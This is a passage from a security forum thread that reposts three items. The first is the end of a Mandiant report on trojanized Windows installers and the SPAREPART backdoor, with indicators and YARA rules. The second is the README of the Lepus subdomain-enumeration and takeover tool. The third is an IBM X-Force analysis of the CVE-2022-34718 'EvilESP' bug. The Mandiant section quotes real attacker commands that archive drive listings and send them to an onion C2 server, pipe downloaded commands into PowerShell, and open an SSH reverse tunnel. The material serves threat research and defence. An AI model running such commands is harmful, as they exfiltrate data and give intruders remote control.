was: ssh -R 80:localhost:80 -i defaultssh localhost[.]run -o stricthostkeychecking=no >> sysinfo This command configures the local system to create a tunnel from the local device to the website localhost.run. C:\Windows\System32\HTTPDService.exe (MD5: a0d668eec4aebaddece795addda5420d) Sheret web server Publicly available as a build from https://github.com/ethanpil/sheret Compiled date: 1970/01/01 00:00:00 Deployment of SPAREPART, Likely as a Redundant Backdoor We identified the creation of a service following initial recon that we believe was the deployment of a redundant backdoor we call SPAREPART. The service named “Microsoft Delivery Network” was created to execute %SYSTEM32%\MicrosoftDeliveryNetwork\MicrosoftDeliveryCenter with the arguments “56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid.onion[.]moe powershell.exe” via the Windows SC command. Functionally SPAREPART is identical to the PowerShell backdoors that were deployed via the schedule tasks in the original ISOs. SPAREPART is executed as a Windows Service DLL, which upon execution will receive the tasking and execute via piping the commands into the PowerShell process. SPAREPART will parse the raw SMIBOS firmware table via the Windows GetSystemFirmwareTable, this code is nearly identical to code published by Microsoft on Github. The code’s purpose is to obtain the UUID of the device, which is later formatted into the same header (h: <UUID) for use in communications with the C2 server. Figure 4: SPAREPART formatting of header The payload parses the arguments provided on the command line. Interestingly there is an error in this parsing. If the threat actor provides a single argument to the payload, that argument is used as the URL and tasking can be downloaded. However, if the second command (in our instance powershell.exe) is missing, the payload will later attempt to create a process with an invalid argument which will mean that the payload is unable to execute commands provided by the threat actor. Figure 5: SPAREPART parsing threat actor input SPAREPART has a unique randomization for its sleep timer. This enables the threat actor to randomise beaconing timing. The randomisation is seeded of the base address of the image in memory, this value is then used to determine a value between 0 and 59. This value acts as the sleep timer in minutes. As the backdoor starts up, it’ll sleep for up to 59 minutes before reaching out to the C2. Any subsequent requests will be delayed for between 3 and 4 hours. If after 10 sleeps the payload has received no tasking (30-40 hours of delays), the payload will terminate until the service is next executed. Figure 6: SPAREPART randomizing the time for next beacon After the required sleep timer has been fulfilled, the payload will attempt to download a command using the provided URL. The payload attempts to download tasking using the WinHttp set of APIs and the hard coded user agent “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0”. The payload attempts to perform a GET request using the previously formatted headers, providing the response is a valid status (200), the data will be read and written to a previously created pipe. Figure 7: SPAREPART downloading payload If a valid response is obtained from the C2 server, the payload will create a new process using the second argument (powershell.exe) and pipe the downloaded commands as the standard input. The payload makes no attempt to return the response to the actor, similarly to the PowerShell backdoor. Figure 8: SPAREPART executing a command Although we witnessed the installation of this backdoor, the threat actor reverted to the PowerShell backdoor for tasking a couple of hours later. Due to the similarities in the payloads and the fact the threat actor reverted to the PowerShell backdoor, we believe that SPAREPART is a redundant backdoor likely to be used if the threat actor loses access to the original schedule tasks. MicrosoftDeliveryCenter (MD5: f9cd5b145e372553dded92628db038d8) SPAREPART backdoor Compiled on: 2022/11/28 02:32:33 PDB path: C:\Users\user\Desktop\ImageAgent\ImageAgent\PreAgent\src\builder\agent.pdb Deployment of Additional Backdoors In addition to the deployment of SPAREPART, the threat actor also deployed additional backdoors on some limited devices. In early September, UNC4166 deployed the payload AzureSettingSync.dll and configured its execution via a schedule task named AzureSync on at least one device. The schedule task was configured to execute AzureSync via rundll32.exe. AzureSettingSync is a BEACON payload configured to communicate with cdnworld.org, which was registered on the June 24, 2022 with an SSL certificate from Let’s Encrypt dated the 26th of August 2022. C:\Windows\System32\AzureSettingSync.dll (MD5: 59a3129b73ba4756582ab67939a2fe3c) BEACON backdoor Original name: tr2fe.dll Compiled on: 1970/01/01 00:00:00 Dropped by 529388109f4d69ce5314423242947c31 (BEACON) Connects to https://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn– Connects to https://cdnworld[.]org/34702–general/sync/42823419-cdn Due to remediation on some compromised devices, we believe that the BEACON instances were quarantined on the devices. Following this, we identified the threat actor had deployed a STOWAWAY backdoor on the victim device. C:\Windows\System32\splwow86.exe (MD5: 0f06afbb4a2a389e82de6214590b312b) STOWAWAY backdoor Compiled on: 1970/01/01 00:00:00 Connects to 193.142.30.166:443 %LOCALAPPDATA%\\SODUsvc.exe (MD5: a8e7d8ec0f450037441ee43f593ffc7c) STOWAWAY backdoor Compiled on: 1970/01/01 00:00:00 Connects to 91.205.230.66:8443 Indicators Scheduled Tasks C:\Windows\System32\Tasks\MicrosoftWindowsNotificationCenter (MD5: 16b21091e5c541d3a92fb697e4512c6d) Schedule task configured to execute Powershell.exe with the command line curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H ('h:'+(wmic csproduct get UUID)) | powershell Trojanized Scheduled Tasks C:\Windows\System32\Tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo (MD5: 1433dd88edfc9e4b25df370c0d8612cf) C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator (MD5: ed7ab9c74aad08b938b320765b5c380d) BEACON Backdoor C:\Windows\System32\AzureSettingSync.dll (MD5: 59a3129b73ba4756582ab67939a2fe3c) Scheduled Tasks for Persistence C:\Windows\System32\Tasks\Microsoft\Windows\Maintenance\AzureSync C:\Windows\System32\Tasks\Microsoft\Windows\Maintenance\AzureSyncDaily STOWAWAY Backdoor C:\Windows\System32\splwow86.exe (MD5: 0f06afbb4a2a389e82de6214590b312b) %LOCALAPPDATA%\SODUsvc.exe (MD5: a8e7d8ec0f450037441ee43f593ffc7c) Services for Persistence Printer driver host for applications SODUsvc On Host Recon Commands Get-ChildItem -Recurse -Force -Path ((C:)+’') | Select-Object -Property Psdrive, FullName, Length, Creationtime, lastaccesstime, lastwritetime | Export-Csv -Path sysinfo -encoding UTF8; Compress-Archive -Path sysinfo -DestinationPath sysinfo.zip -Force; Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8 invoke-restmethod http://ip-api[.]com/json | Export-Csv -path sysinfo -encoding UTF8 Get-Volume | Where-Object {.DriveLetter -and .DriveLetter -ne ‘C’ -and .DriveType -eq ‘Fixed’} | ForEach-Object {Get-ChildItem -Recurse -Directory (.DriveLetter+‘:’) | Select-Object -Property Psdrive, FullName, Length, Creationtime, lastaccesstime, lastwritetime | Export-Csv -Path sysinfo -encoding UTF8; Compress-Archive -Path sysinfo -DestinationPath sysinfo -Force; curl.exe -H (’h:’+(wmic csproduct get UUID)) –data-binary ‘@sysinfo.zip’ -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe chcp 65001; [console]::outputencoding = [system.text.encoding]::UTF8; Start-Process powershell -argument “Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8” -wait -nonewwindow; curl.exe -H (‘h:’+(wmic csproduct get UUID)) –data-binary “@sysinfo” -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe; rm sysinfo Trojanized Windows Image Network Indicators Indicators of Compromise Signature 56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid[.]onion[.]moe Malicious Windows Image Tor C2 ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]moe Malicious Windows Image Tor C2 ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]ws Malicious Windows Image Tor C2 BEACON C2s https://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn– https://cdnworld[.]org/34702–general/sync/42823419-cdn STOWAWAY C2s 193.142.30[.]166:443 91.205.230[.]66:8443 Appendix MITRE ATT&CK Framework ATT&CK Tactic Category Techniques Initial Access T1195.002: Compromise Software Supply Chain Persistence T1136: Create Account T1543.003: Windows Service Discovery T1049: System Network Connections Discovery Execution T1047: Windows Management Instrumentation T1059: Command and Scripting Interpreter T1059.001: PowerShell T1059.005: Visual Basic T1569.002: Service Execution Defense Evasion T1027: Obfuscated Files or Information T1055: Process Injection T1140: Deobfuscate/Decode Files or Information T1218.011: Rundll32 T1562.004: Disable or Modify System Firewall T1574.011: Services Registry Permissions Weakness Command and Control T1071.004: DNS T1090.003: Multi-hop Proxy T1095: Non-Application Layer Protocol T1573.002: Asymmetric Cryptography Resource Development T1587.002: Code Signing Certificates T1588.004: Digital Certificates T1608.003: Install Digital Certificate Detection Rules rule M_Backdoor_SPAREPART_SleepGenerator { meta: author = "Mandiant" date_created = "2022-12-14" description = "Detects the algorithm used to determine the next sleep timer" version = "1" weight = "100" hash = "f9cd5b145e372553dded92628db038d8" disclaimer = "This rule is meant for hunting and is not tested to run in a production environment." strings: $ = {C1 E8 06 89 [5] C1 E8 02 8B} $ = {c1 e9 03 33 c1 [3] c1 e9 05 33 c1 83 e0 01} $ = {8B 80 FC 00 00 00} $ = {D1 E8 [4] c1 E1 0f 0b c1} condition: all of them } rule M_Backdoor_SPAREPART_Struct { meta: author = "Mandiant" date_created = "2022-12-14" description = "Detects the PDB and a struct used in SPAREPART" hash = "f9cd5b145e372553dded92628db038d8" disclaimer = "This rule is meant for hunting and is not tested to run in a production environment." strings: $pdb = "c:\\Users\\user\\Desktop\\ImageAgent\\ImageAgent\\PreAgent\\src\\builder\\agent.pdb" ascii nocase $struct = { 44 89 ac ?? ?? ?? ?? ?? 4? 8b ac ?? ?? ?? ?? ?? 4? 83 c5 28 89 84 ?? ?? ?? ?? ?? 89 8c ?? ?? ?? ?? ?? 89 54 ?? ?? 44 89 44 ?? ?? 44 89 4c ?? ?? 44 89 54 ?? ?? 44 89 5c ?? ?? 89 5c ?? ?? 89 7c ?? ?? 89 74 ?? ?? 89 6c ?? ?? 44 89 74 ?? ?? 44 89 7c ?? ?? 44 89 64 ?? ?? 8b 84 ?? ?? ?? ?? ?? 44 8b c8 8b 84 ?? ?? ?? ?? ?? 44 8b c0 4? 8d 15 ?? ?? ?? ?? 4? 8b cd ff 15 ?? ?? ?? ?? } condition: (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pdb and $struct and filesize < 20KB } Sursa: https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government
      • 2
      • Thanks
      • Upvote
  10. Lepus Lepus is a tool for enumerating subdomains, checking for subdomain takeovers and perform port scans - and boy, is it fast! Basic Usage lepus.py yahoo.com Summary Enumeration modes Subdomain Takeover Port Scan Installation Arguments Full command example Enumeration modes The enumeration modes are different ways lepus uses to identify sudomains for a given domain. These modes are: Collectors Dictionary Permutations Reverse DNS Markov Moreover: For all methods, lepus checks if the given domain or any generated potential subdomain is a wildcard domain or not. After identification, lepus collects ASN and network information for the identified domains that resolve to public IP Addresses. Collectors The Collectors mode collects subdomains from the following services: Service API Required AlienVault OTX No Anubis-DB No Bevigil Yes BinaryEdge Yes BufferOver Yes C99 Yes Censys Yes CertSpotter No CommonCrawl No CRT No DNSDumpster No DNSRepo Yes DNSTrails Yes Farsight DNSDB Yes FOFA Yes Fullhunt Yes HackerTarget No HunterIO Yes IntelX Yes LeakIX Yes Maltiverse No Netlas Yes PassiveTotal Yes Project Discovery Chaos Yes RapidDNS No ReconCloud No Riddler Yes Robtex Yes SecurityTrails Yes Shodan Yes SiteDossier No ThreatBook Yes ThreatCrowd No ThreatMiner No URLScan Yes VirusTotal Yes Wayback Machine No Webscout No WhoisXMLAPI Yes ZoomEye Yes You can add your API keys in the config.ini file. The Collectors module will run by default on lepus. If you do not want to use the collectors during a lepus run (so that you don't exhaust your API key limits), you can use the -nc or --no-collectors argument. Dictionary The dictionary mode can be used when you want to provide lepus a list of subdomains. You can use the -w or --wordlist argument followed by the file. A custom list comes with lepus located at lists/subdomains.txt. An example run would be: lepus.py -w lists/subdomains.txt yahoo.com Permutations The Permutations mode performs changes on the list of subdomains that have been identified. For each subdomain, a number of permutations will take place based on the lists/words.txt file. You can also provide a custom wordlist for permutations with the -pw or --permutation-wordlist argument, followed by the file name.An example run would be: lepus.py --permutate yahoo.com or lepus.py --permutate -pw customsubdomains.txt yahoo.com ReverseDNS The ReverseDNS mode will gather all IP addresses that were resolved and perform a reverse DNS on each one in order to detect more subdomains. For example, if www.example.com resolves to 1.2.3.4, lepus will perform a reverse DNS for 1.2.3.4 and gather any other subdomains belonging to example.com, e.g. www2,internal or oldsite. To run the ReverseDNS module use the --reverse argument. Additionally, --ripe (or -ripe) can be used in order to instruct the module to query the RIPE database using the second level domain for potential network ranges. Moreover, lepus supports the --ranges (or -r) argument. You can use it to make reverse DNS resolutions against CIDRs that belong to the target domain. By default this module will take into account all previously identified IPs, then defined ranges, then ranges identified through the RIPE database. In case you only want to run the module against specific or RIPE identified ranges, and not against all already identified IPs, you can use the --only-ranges (-or) argument. An example run would be: lepus.py --reverse yahoo.com or lepus.py --reverse -ripe -r 172.216.0.0/16,183.177.80.0/23 yahoo.com or only against the defined or identified from RIPE lepus.py --reverse -or -ripe -r 172.216.0.0/16,183.177.80.0/23 yahoo.com Hint: lepus will identify ASNs and Networks during enumeration, so you can also use these ranges to identify more subdomains with a subsequent run. Markov With this module, Lepus will utilize Markov chains in order to train itself and then generate subdomain based on the already known ones. The bigger the general surface, the better the tool will be able to train itself and subsequently, the better the results will be. The module can be activated with the --markovify argument. Parameters also include the Markov state size, the maximum length of the generated candidate addition, and the quantity of generated candidates. Predefined values are 3, 5 and 5 respectively. Those arguments can be changed with -ms (--markov-state), -ml (--markov-length) and -mq (--markov-quantity) to meet your needs. Keep in mind that the larger these values are, the more time Lepus will need to generate the candidates. It has to be noted that different executions of this module might generate different candidates, so feel free to run it a few times consecutively. Keep in mind that the higher the -ms, -ml and -mq values, the more time will be needed for candidate generation. lepus.py --markovify yahoo.com or lepus.py --markovify -ms 5 -ml 10 -mq 10 Subdomain Takeover Lepus has a list of signatures in order to identify if a domain can be taken over. You can use it by providing the --takeover argument. This module also supports Slack notifications, once a potential takeover has been identified, by adding a Slack token in the config.ini file. The checks are made against the following services: Acquia Activecampaign Aftership Aha! Airee Amazon AWS/S3 Apigee Azure Bigcartel Bitbucket Brightcove Campaign Monitor Cargo Collective Desk Feedpress Fly.io Getresponse Ghost.io Github Hatena Helpjuice Helpscout Heroku Instapage Intercom JetBrains Kajabi Kayako Launchrock Mashery Maxcdn Moosend Ning Pantheon Pingdom Readme.io Simplebooklet Smugmug Statuspage Strikingly Surge.sh Surveygizmo Tave Teamwork Thinkific Tictail Tilda Tumblr Uptime Robot UserVoice Vend Webflow Wishpond Wordpress Zendesk Port Scan The port scan module will check open ports against a target and log them in the results. You can use the --portscan argument which by default will scan ports 80, 443, 8000, 8080, 8443. You can also use custom ports or choose a predefined set of ports. Ports set Ports small 80, 443 medium (default) 80, 443, 8000, 8080, 8443 large 80, 81, 443, 591, 2082, 2087, 2095, 2096, 3000, 8000, 8001, 8008, 8080, 8083, 8443, 8834, 8888, 9000, 9090, 9443 huge 80, 81, 300, 443, 591, 593, 832, 981, 1010, 1311, 2082, 2087, 2095, 2096, 2480, 3000, 3128, 3333, 4243, 4567, 4711, 4712, 4993, 5000, 5104, 5108, 5800, 6543, 7000, 7396, 7474, 8000, 8001, 8008, 8014, 8042, 8069, 8080, 8081, 8088, 8090, 8091, 8118, 8123, 8172, 8222, 8243, 8280, 8281, 8333, 8443, 8500, 8834, 8880, 8888, 8983, 9000, 9043, 9060, 9080, 9090, 9091, 9200, 9443, 9800, 9943, 9980, 9981, 12443, 16080, 18091, 18092, 20720, 28017 An example run would be: lepus.py --portscan yahoo.com or lepus.py --portscan -p huge yahoo.com or lepus.py --portscan -p 80,443,8082,65123 yahoo.com Installation Normal installation: $ python3.7 -m pip install -r requirements.txt Preferably install in a virtualenv: $ pyenv virtualenv 3.7.4 lepus $ pyenv activate lepus $ pip install -r requirements.txt Installing latest python on debian: $ apt install build-essential zlib1g-dev libncurses5-dev libgdbm-dev libnss3-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev wget $ curl -O https://www.python.org/ftp/python/3.7.4/Python-3.7.4.tar.xz $ tar -xf Python-3.7.4.tar.xz $ cd Python-3.7.4 $ ./configure --enable-optimizations --enable-loadable-sqlite-extensions $ make $ make altinstall Arguments usage: lepus.py [-h] [-w WORDLIST] [-hw] [-t THREADS] [-nc] [-zt] [--permutate] [-pw PERMUTATION_WORDLIST] [--reverse] [-r RANGES] [--portscan] [-p PORTS] [--takeover] [--markovify] [-ms MARKOV_STATE] [-ml MARKOV_LENGTH] [-mq MARKOV_QUANTITY] [-f] [-v] domain Infrastructure OSINT positional arguments: domain domain to search optional arguments: -h, --help show this help message and exit -w WORDLIST, --wordlist WORDLIST wordlist with subdomains -hw, --hide-wildcards hide wildcard resolutions -t THREADS, --threads THREADS number of threads [default is 100] -nc, --no-collectors skip passive subdomain enumeration -zt, --zone-transfer attempt to zone transfer from identified name servers --permutate perform permutations on resolved domains -pw PERMUTATION_WORDLIST, --permutation-wordlist PERMUTATION_WORDLIST wordlist to perform permutations with [default is lists/words.txt] --reverse perform reverse dns lookups on resolved public IP addresses -ripe, --ripe query ripe database with the 2nd level domain for networks to be used for reverse lookups -r RANGES, --ranges RANGES comma seperated ip ranges to perform reverse dns lookups on -or, --only-ranges use only ranges provided with -r or -ripe and not all previously identifed IPs --portscan scan resolved public IP addresses for open ports -p PORTS, --ports PORTS set of ports to be used by the portscan module [default is medium] --takeover check identified hosts for potential subdomain take- overs --markovify use markov chains to identify more subdomains -ms MARKOV_STATE, --markov-state MARKOV_STATE markov state size [default is 3] -ml MARKOV_LENGTH, --markov-length MARKOV_LENGTH max length of markov substitutions [default is 5] -mq MARKOV_QUANTITY, --markov-quantity MARKOV_QUANTITY max quantity of markov results per candidate length [default is 5] -f, --flush purge all records of the specified domain from the database -v, --version show program's version number and exit Full command example The following, is an example run with all available active arguments: ./lepus.py python.org --wordlist lists/subdomains.txt --permutate -pw ~/mypermsword.lst --reverse -ripe -r 10.11.12.0/24 --portscan -p huge --takeover --markovify -ms 3 -ml 10 -mq 10 The following command flushes all database entries for a specific domain: ./lepus.py python.org --flush Sursa: https://github.com/GKNSB/Lepus
      • 2
      • Thanks
      • Upvote
  11. Dissecting and Exploiting TCP/IP RCE Vulnerability “EvilESP” Software Vulnerabilities January 20, 2023 By Valentina Palmiotti 10 min read September’s Patch Tuesday unveiled a critical remote vulnerability in tcpip.sys, CVE-2022-34718. The advisory from Microsoft reads: “An unauthenticated attacker could send a specially crafted IPv6 packet to a Windows node where IPsec is enabled, which could enable a remote code execution exploitation on that machine.” Pure remote vulnerabilities usually yield a lot of interest, but even over a month after the patch, no additional information outside of Microsoft’s advisory had been publicly published. From my side, it had been a long time since I attempted to do a binary patch diff analysis, so I thought this would be a good bug to do root cause analysis and craft a proof-of-concept (PoC) for a blog post. On October 21 of last year, I posted an exploit demo and root cause analysis of the bug. Shortly thereafter a blog post and PoC was published by Numen Cyber Labs on the vulnerability, using a different exploitation method than I used in my demo. In this blog — my follow-up article to my exploit video — I include an in-depth explanation of the reverse engineering of the bug and correct some inaccuracies I found in the Numen Cyber Labs blog. In the following sections, I cover reverse engineering the patch for CVE-2022-34718, the affected protocols, identifying the bug, and reproducing it. I’ll outline setting up a test environment and write an exploit to trigger the bug and cause a Denial of Service (DoS). Finally, I’ll look at exploit primitives and outline the next steps to turn the primitives into remote code execution (RCE). Patch Diffing Microsoft’s advisory does not contain any specific details of the vulnerability except that it is contained in the TCP/IP driver and requires IPsec to be enabled. In order to identify the specific cause of the vulnerability, we’ll compare the patched binary to the pre-patch binary and try to extract the “diff”(erence) using a tool called BinDiff. I used Winbindex to obtain two versions of tcpip.sys: one right before the patch and one right after, both for the same version of Windows. Getting sequential versions of the binaries is important, as even using versions a few updates apart can introduce noise from differences that are not related to the patch, and cause you to waste time while doing your analysis. Winbindex has made patch analysis easier than ever, as you can obtain any Windows binary beginning from Windows 10. I loaded both of the files in Ghidra, applied the Program Database (pdb) files, and ran auto analysis (checking aggressive instruction finder works best). Afterward, the files can be exported into a BinExport format using the extension BinExport for Ghidra. The files can then be loaded into BinDiff to create a diff and start analyzing their differences: BinDiff summary comparing the pre- and post-patch binaries BinDiff works by matching functions in the binaries being compared using various algorithms. In this case there, we have applied function symbol information from Microsoft, so all the functions can be matched by name. List of matched functions sorted by similarity Above we see there are only two functions that have a similarity less than 100%. The two functions that were changed by the patch are IppReceiveEsp and Ipv6pReassembleDatagram. Vulnerability Root Cause Analysis Previous research shows the Ipv6pReassembleDatagram function handles reassembling Ipv6 fragmented packets. The function name IppReceiveEsp seems to indicate this function handles the receiving of IPsec ESP packets. Before diving into the patch, I’ll briefly cover Ipv6 fragmentation and IPsec. Having a general understanding of these packet structures will help when attempting to reverse engineer the patch. IPv6 Fragmentation: An IPv6 packet can be divided into fragments with each fragment sent as a separate packet. Once all of the fragments reach the destination, the receiver reassembles them to form the original packet. The diagram below illustrates the fragmentation: Illustration of Ipv6 fragmentation According to the RFC, fragmentation is implemented via an Extension Header called the Fragment header, which has the following format: Ipv6 Fragment Header format Where the Next Header field is the type of header present in the fragmented data. IPsec (ESP): IPsec is a group of protocols that are used together to set up encrypted connections. It’s often used to set up Virtual Private Networks (VPNs). From the first part of patch analysis, we know the bug is related to the processing of ESP packets, so we’ll focus on the Encapsulating Security Payload (ESP) protocol. As the name suggests, the ESP protocol encrypts (encapsulates) the contents of a packet. There are two modes: in tunnel mode, a copy of IP header is contained in the encrypted payload, and in transport mode where only the transport layer portion of the packet is encrypted. Like IPv6 fragmentation, ESP is implemented as an extension header. According to the RFC, an ESP packet is formatted as follows: Top Level Format of an ESP Packet Where Security Parameters Index (SPI) and Sequence Number fields comprise the ESP extension header, and the fields between and including Payload Data and Next Header are encrypted. The Next Header field describes the header contained in Payload Data. Now with a primer of Ipv6 Fragmentation and IPsec ESP, we can continue the patch diff analysis by analyzing the two functions we found were patched. Ipv6pReassembleDatagram Comparing the side by side of the function graphs, we can see that a single new code block has been introduced into the patched function: Side-by-side comparison of the pre- and post-patch function graphs of Ipv6ReassembleDatagram Let’s take a closer look at the block: New code block in the patched function The new code block is doing a comparison of two unsigned integers (in registers EAX and EDX) and jumping to a block if one value is less than the other. Let’s take a look at that destination block: The target code has an unconditional call to the function IppDeleteFromReassemblySet. Taking a guess from the name of this function, this block seems to be for error handling. We can intuit that the new code that was added is some sort of bounds check, and there has been a “goto error” line inserted into the code, if the check fails. With this bit of insight, we can perform static analysis in a decompiler. 0vercl0ck previously published a blog post doing vulnerability analysis on a different Ipv6 vulnerability and went deep into the reverse engineering of tcpip.sys. From this work and some additional reverse engineering, I was able to fill in structure definitions for the undocumented Packet_t and Reassembly_t objects, as well as identify a couple of crucial local variable assignments. Decompilation output of Ipv6ReassembleDatagram In the above code snippet, the pink box surrounds the new code added by the patch. Reassembly->nextheader_offset contains the byte offset of the next_header field in the Ipv6 fragmentation header. The bounds check compares next_header_offset to the length of the header buffer. On line 29, HeaderBufferLen is used to allocate a buffer and on line 35, Reassembly->nextheder_offset is used to index and copy into the allocated buffer. Because this check was added, we now know there was a condition that allows nextheader_offset to exceed the header buffer length. We’ll move on to the second patched function to seek more answers. IppReceiveEsp Looking at the function graph side by side in the BinDiff workspace, we can identify some new code blocks introduced into the patched function: Side-by-side comparison of the pre- and post-patch function graphs of IppReceiveEsp The image below shows the decompilation of the function IppReceiveEsp, with a pink box surrounding the new code added by the patch. Decompilation output of IppReceiveESP Here, a new check was added to examine the Next Header field of the ESP packet. The Next Header field identifies the header of the decrypted ESP packet. Recall that a Next Header value can correspond to an upper layer protocol (such as TCP or UDP) or an extension header (such as fragmentation header or routing header). If the value in NextHeader is 0, 0x2B, or 0x2C, IppDiscardReceivedPackets is called and the error code is set to STATUS_DATA_NOT_ACCEPTED. These values correspond to IPv6 Hop-by-Hop Option, Routing Header for Ipv6, and Fragment Header for IPv6, respectively. Referring back to the ESP RFC it states, “In the IPv6 context, ESP is viewed as an end-to-end payload, and thus should appear after hop-by-hop, routing, and fragmentation extension headers.” Now the problem becomes clear. If a header of these types is contained within an ESP payload, it violates the RFC of the protocol, and the packet will be discarded. Putting It All Together Now that we have diagnosed the patches in two different functions, we can figure out how they are related. In the first function Ipv6ReassembleDatagram, we determined the fix was for a buffer overflow. Decompilation output of Ipv6ReassembleDatagram Recall that the size of the victim buffer is calculated as the size of the extension headers, plus the size of an Ipv6 header (Line 10 above). Now refer back to the patch that was inserted (Line 16). Reassembly->nextheader_offset refers to the offset of the Next Header value of the buffer holding the data for the fragment. Now refer back to the structure of an ESP packet: Top Level Format of an ESP Packet Notice that the Next Header field comes *after* Payload Data. This means that Reassembly->nextheader_offset will include the size of the Payload Data, which is controlled by the size of the data, and can be much greater than the size of the extension headers. The expected location of the Next Header field is inside an extension header or Ipv6 header. In an ESP packet, it is not inside the header, since it is actually contained in the encrypted portion of the packet. Illustrated root cause of CVE-2022-34718 Now refer back to line 35 of Ipv6ReassembleDatagram, this is where an out of bounds 1 byte write occurs (the size and value of NextHeader). Reproducing the Bug We now know the bug can be triggered by sending an IPv6 fragmented datagram via IPsec ESP packets. The next question to answer: how will the victim be able to decrypt the ESP packets? To answer this question, I first tried to send packets to a victim containing an ESP Header with junk data and put a breakpoint on to the vulnerable IppReceiveEsp function, to see if the function could be reached. The breakpoint was hit, but the internal function I thought did the decrypting IppReceiveEspNbl, returned an error, so the vulnerable code was never reached. I further reverse engineered IppReceiveEspNbl and worked my way through to find the point of failure. This is where I learned that in order to successfully decrypt an ESP packet, a security association must be established. A security association consists of a shared state, primarily cryptographic keys and parameters, maintained between two endpoints to secure traffic between them. In simple terms, a security association defines how a host will encrypt/decrypt/authenticate traffic coming from/going to another host. Security associations can be established via the Internet Key Exchange (IKE) or Authenticated IP Protocol. In essence, we need a way to establish a security association with the victim, so that it knows how to decrypt the incoming data from the attacker. For testing purposes, instead of implementing IKE, I decided to create a security association on the victim manually. This can be done using the Windows Filtering Platform WinAPI (WFP). Numen’s blog post stated that it’s not possible to use WFP for secret key management. However, that is incorrect and by modifying sample code provided by Microsoft, it’s possible to set a symmetric key that the victim will use to decrypt ESP packets coming from the attacker IP. Exploitation Now that the victim knows how to decrypt ESP traffic from us (the attacker) we can build malformed encrypted ESP packets using scapy. Using scapy we can send packets at the IP layer. The exploitation process is simple: CVE-2022-34718 PoC I create a set of fragmented packets from an ICMPv6 Echo request. Then for each fragment, they are encrypted into an ESP layer before sending. Primitive From the root cause analysis diagram pictured above, we know our primitive gives us an out of bounds write at offset = sizeof(Payload Data) + sizeof(Padding) + sizeof(Padding Length) The value of the write is controllable via the value of the Next Header field. I set this value on line 36 in my exploit above (0x41 ). Denial of Service (DoS) Corrupting just one byte into a random offset of the NetIoProtocolHeader2 pool (where the target buffer is allocated), usually does not immediately cause a crash. We can reliably crash the target by inserting additional headers within the fragmented message to parse, or by repeatedly pinging the target after corrupting a large portion of the pool. Limitations to Overcome For RCE offset is attacker controlled, however according to the ESP RFC, padding is required such that the Integrity Check Value (ICV) field (if present) is aligned on a 4-byte boundary. Because sizeof(Padding Length) = sizeof(Next Header) = 1, sizeof(Payload Data) + sizeof(Padding) + 2 must be 4 byte aligned. And therefore: offset = 4n - 1 Where n can be any positive integer, constrained by the fact the payload data and padding must fit within a single packet and is therefore limited by MTU (frame size). This is problematic because it means full pointers cannot be overwritten. This is limiting, but not necessarily prohibitive; we can still overwrite the offset of an address in an object, a size, a reference counter, etc. The possibilities available to us depend on what objects can be sprayed in the kernel pool where the victim headerBuff is allocated. Heap Grooming Research The affected kernel pool in WinDbg The victim out of bounds buffer is allocated in the NetIoProtocolHeader2 pool. The first steps in heap grooming research are: examine the type of objects allocated in this pool, what is contained in them, how they are used, and how the objects are allocated/freed. This will allow us to examine how the write primitive can be used to obtain a leak or build a stronger primitive. We are not necessarily restricted to NetIoProtocolHeader2. However, because the position of the victim out-of-bounds buffer cannot be predicted, and the address of surrounding pools is randomized, targeting other pools seems challenging. Demo Watch the demo exploiting CVE-2022-34718 ‘EvilESP’ for DoS below: Takeaways When laid out like this, the bug seems pretty simple. However, it took several long days of reverse engineering and learning about various networking stacks and protocols to understand the full picture and write a DoS exploit. Many researchers will say that configuring the setup and understanding the environment is the most time-consuming and tedious part of the process, and this was no exception. I am very glad that I decided to do this short project; I understand Ipv6, IPsec, and fragmentation much better now. To learn how IBM Security X-Force can help you with offensive security services, schedule a no-cost consult meeting here: IBM X-Force Scheduler. If you are experiencing cybersecurity issues or an incident, contact X-Force to help: U.S. hotline 1-888-241-9812 | Global hotline (+001) 312-212-8034. References https://www.rfc-editor.org/rfc/rfc8200#section-4.5 https://blog.quarkslab.com/analysis-of-a-windows-ipv6-fragmentation-vulnerability-cve-2021-24086.html https://doar-e.github.io/blog/2021/04/15/reverse-engineering-tcpipsys-mechanics-of-a-packet-of-the-death-cve-2021-24086/#diffing-microsoft-patches-in-2021 https://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml https://datatracker.ietf.org/doc/html/rfc4303 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34718 Sursa: https://securityintelligence.com/posts/dissecting-exploiting-tcp-ip-rce-vulnerability-evilesp/
      • 1
      • Thanks
